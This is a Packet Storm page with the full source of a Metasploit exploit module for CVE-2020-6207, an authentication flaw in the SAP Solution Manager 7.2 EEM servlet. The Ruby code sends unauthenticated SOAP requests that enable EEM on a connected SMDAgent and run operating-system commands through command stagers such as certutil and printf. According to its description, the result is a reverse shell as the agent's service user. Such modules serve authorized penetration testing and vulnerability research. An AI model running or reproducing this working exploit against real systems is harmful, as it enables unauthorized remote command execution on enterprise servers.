what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

SAP Solution Manager 7.2 Remote Command Execution

SAP Solution Manager 7.2 Remote Command Execution
Posted Mar 26, 2021
Authored by Dmitry Chastuhin, Pablo Artuso, Vladimir Ivanov, Yvan Genuer | Site metasploit.com

This Metasploit module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet of SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents allowing an attacker to send HTTP requests (SSRF) and execute OS commands on the connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8. Successful exploitation will allow unauthenticated remote attackers to get a reverse shell from connected to the SolMan agent as the user under which it runs SMDAgent service, which is usually daaadm.

tags | exploit, java, remote, web, shell
advisories | CVE-2020-6207
SHA-256 | 0d5122d6fb0ba7f681b7229fc5c197780b51710c6395404115ad8686072b2b08

SAP Solution Manager 7.2 Remote Command Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HTTP::SapSolManEemMissAuth
include Msf::Exploit::CmdStager

def initialize(info = {})
super(
update_info(
info,
'Name' => 'SAP Solution Manager remote unauthorized OS commands execution',
'License' => MSF_LICENSE,
'Author' =>
[
'Yvan Genuer', # @_1ggy The researcher who originally found this vulnerability
'Pablo Artuso', # @lmkalg The researcher who originally found this vulnerability
'Dmitry Chastuhin', # @chipik The researcher who made first PoC
'Vladimir Ivanov' # @_generic_human_ This Metasploit module
],
'Description' => %q{
This module exploits the CVE-2020-6207 vulnerability within the SAP EEM servlet (tc~smd~agent~application~eem) of
SAP Solution Manager (SolMan) running version 7.2. The vulnerability occurs due to missing authentication
checks when submitting a SOAP request to the /EemAdminService/EemAdmin page to get information about connected SMDAgents,
send HTTP request (SSRF) and execute OS command on connected SMDAgent. Works stable in connected SMDAgent with Java version 1.8.

Successful exploitation will allow unauthenticated remote attackers to get reverse shell from connected to the SolMan
agent as the user under which it runs SMDAgent service, usually daaadm.
},
'References' =>
[
['CVE', '2020-6207'],
['URL', 'https://i.blackhat.com/USA-20/Wednesday/us-20-Artuso-An-Unauthenticated-Journey-To-Root-Pwning-Your-Companys-Enterprise-Software-Servers-wp.pdf'],
['URL', 'https://github.com/chipik/SAP_EEM_CVE-2020-6207']
],
'Privileged' => false,
'Targets' => [
[
'Linux',
{
'Arch' => [ARCH_X64, ARCH_X86],
'Platform' => 'linux',
'CmdStagerFlavor' => ['printf', 'echo', 'bourne']
}
],
[
'Windows',
{
'Arch' => [ARCH_X64, ARCH_X86],
'Platform' => 'win',
'CmdStagerFlavor' => ['certutil', 'vbs', 'debug_write', 'debug_asm']
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => '2020-10-03'
)
)

register_options(
[
Opt::RPORT(50000),
OptString.new('TARGETURI', [true, 'Path to the SAP Solution Manager EemAdmin page from the web root', '/EemAdminService/EemAdmin']),
OptString.new('AGENT', [true, 'Agent server name for exploitation', 'agent_server_name']),
]
)
end

def setup_variables
@host = datastore['RHOSTS']
@port = datastore['RPORT']
@path = datastore['TARGETURI']

@agent_name = datastore['AGENT']
@script_name = Rex::Text.rand_text_alphanumeric(12)

if datastore['SSL']
@schema = 'https://'
else
@schema = 'http://'
end

@solman_uri = "#{@schema}#{@host}:#{@port}#{@path}"
end

def execute_command(cmd, _opts = {})
setup_variables

vprint_status("Start script: #{@script_name} with RCE payload on agent: #{@agent_name}")
send_soap_request(make_soap_body(@agent_name, @script_name, make_rce_payload(cmd)))

vprint_status("Stop script: #{@script_name} on agent: #{@agent_name}")
stop_script_in_agent(@agent_name, @script_name)

vprint_status("Delete script: #{@script_name} on agent: #{@agent_name}")
delete_script_in_agent(@agent_name, @script_name)
end

# Report Service and Vulnerability
def report_service_and_vuln
report_service(
host: @host,
port: @port,
name: 'soap',
proto: 'tcp',
info: 'SAP Solution Manager'
)
report_vuln(
host: @host,
port: @port,
name: name,
refs: references
)
end

def check
setup_variables
begin
agents = make_agents_array
rescue RuntimeError
return Exploit::CheckCode::Safe
end
if agents.empty?
print_status("Solution Manager server: #{@host}:#{@port} is vulnerable but no agents are connected!")
else
print_good("Successfully retrieved agent list:\n#{pretty_agents_table(agents)}")
end
report_service_and_vuln
Exploit::CheckCode::Vulnerable
end

def exploit
setup_variables
check_agent(@agent_name)

print_status("Enable EEM on agent: #{@agent_name}")
enable_eem(@agent_name)

report_service_and_vuln
execute_cmdstager
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close